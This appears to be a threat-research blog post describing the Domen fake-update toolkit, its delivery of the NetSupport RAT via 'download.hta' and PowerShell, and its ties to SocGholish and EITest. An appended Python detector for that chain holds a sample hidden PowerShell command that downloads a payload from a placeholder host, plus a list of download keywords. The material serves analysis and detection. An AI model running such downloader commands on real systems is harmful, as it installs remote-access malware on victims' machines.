Some of the most common web threats we track have a social engineering component. Perhaps the more popular ones are those encountered via malvertising, or hacked websites that push fraudulent updates.

We recently identified a website compromise with a scheme we had not seen before; it's part of a campaign using a social engineering toolkit that has drawn over 100,000 visits in the past few weeks.

The toolkit, which we dub Domen, is built around a detailed client-side script that acts as a framework for different fake update templates, customized for both desktop and mobile users in up to 30 languages.

Loaded as an iframe from compromised websites (most of them running WordPress) and displayed over top as an additional layer, it entices victims to install so-called updates that instead download the NetSupport remote administration tool.

In this blog we describe its tactics, techniques, and procedures (TTPs) that remind us of some past and current social engineering campaigns.

The premise looks typical of many other social engineering toolkit templates we've come across before. Here, users are tricked into downloading and running a Flash Player update:

Figure 1: Fake Flash Player update notification

Note that the domain wheelslistnet belongs to a legitimate website that has been hacked and where an iframe from chrom-updateonline is placed as a layer above the normal page:

Figure 2: Deobfuscated code found on compromised site that loads malicious iframe

Clicking the UPDATE or LATER button downloads a file called 'download.hta', indexed on Atlassian's Bitbucket platform and hosted on an Amazon server (bbuseruploads.s3.):

Figure 3: Bitbucket project from user 'Garik'

Upon execution, that HTA script will run PowerShell and connect to xyxyxyxyxyxyz in order to retrieve a malware payload.

Figure 4: Malicious mshta script retrieves payload from external domain

That payload is a package that contains the NetSupport RAT:

Figure 5: Process tree showing execution flow

Figure 6: Observed HTTP traffic confirming NetSupport RAT infection

Link with "FakeUpdates" aka SocGholish

In late 2018, we documented a malicious redirection campaign that we dubbed FakeUpdates, also known as SocGholish based on a ruleset from EmergingThreats. It leverages compromised websites and performs some of the most creative fingerprinting checks we've seen, before delivering its payload (NetSupport RAT).

We recently noticed a tweet that reported SocGholish via the compromised site fistfuloftalentcom, although the linked sandbox report shows the same template we described earlier, which is different than the SocGholish one:

Figure 7: New theme erroneously associated with SocGholish

The reason why the sandbox is flagging SocGholish is because the compromised site contains artifacts related to it, and does, in some circumstances, actually redirect to it:

Figure 8: SocGholish template

This hacked site actually hosts two different campaigns and, based on some browser and network fingerprinting, you might be served one or the other. This can be confirmed by looking at the injected code in two different pieces of JavaScript, the first one being flagged by the EmergingThreats ruleset.

Figure 9: Comparing two campaigns by looking at the injected JavaScript

Although the templates for SocGholish and the new campaign are different, they both:

- can occasionally be found on the same compromised host.
- abuse or abused a cloud hosting platform (Bitbucket, Dropbox).
- download a fake update as 'download.hta'.

Side note: A publicly saved VirusTotal graph (saved screenshot here) shows that the threat actors also used Dropbox at some point to host the NetSupport RAT. They double compressed the file, first as zip and then as rar.

Similarities with SocGholish could be simply due to the threat actor getting inspired by what has been done before. However, the fact that both templates deliver the same RAT is something noteworthy.

Link with EITest

At about the same time as we were reviewing this new redirection chain, we saw this other one identified by tagged as FontPack that is reminiscent of the HoeflerText social engineering toolkit reported by Proofpoint in early 2017.
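As an added example that is not part of the original post, the following Python flags the execution chain this campaign relies on (a 'download.hta' run by mshta, which then spawns PowerShell to fetch the payload) over constructed process-creation events; the PIDs, file paths and the URL are placeholders, not values from the campaign.

```python
"""Detect the download.hta -> mshta.exe -> powershell.exe chain in process-creation events."""
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line

# Constructed sample telemetry (Sysmon Event ID 1 style), NOT real data:
# explorer launches the downloaded HTA via mshta, and the script runs PowerShell.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\Downloads\download.hta"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://PLACEHOLDER.invalid/pkg','C:\\Users\\alice\\pkg.zip')\""),
    ProcEvent(400, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign
]

# PowerShell verbs that indicate the script is retrieving a second stage.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")

def find_hta_powershell_chains(events):
    """Return one finding per powershell.exe whose parent is mshta.exe running a .hta."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not e.image.lower().endswith("\\powershell.exe"):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not parent.image.lower().endswith("\\mshta.exe"):
            continue
        hta_cmd = parent.cmdline.lower()
        if ".hta" not in hta_cmd:
            continue
        ps_cmd = e.cmdline.lower()
        findings.append({
            "mshta_pid": parent.pid,
            "powershell_pid": e.pid,
            # HTA launched from a user download location, as in the fake-update lure
            "from_downloads": "\\downloads\\" in hta_cmd,
            # PowerShell is fetching something, as in Figure 4's payload retrieval
            "downloader": any(m in ps_cmd for m in DOWNLOAD_MARKERS),
        })
    return findings

if __name__ == "__main__":
    for f in find_hta_powershell_chains(SAMPLE_EVENTS):
        print(f)
```

Legitimate mshta usage exists, so the `from_downloads` and `downloader` flags are what should drive alert severity rather than the parent/child pairing alone.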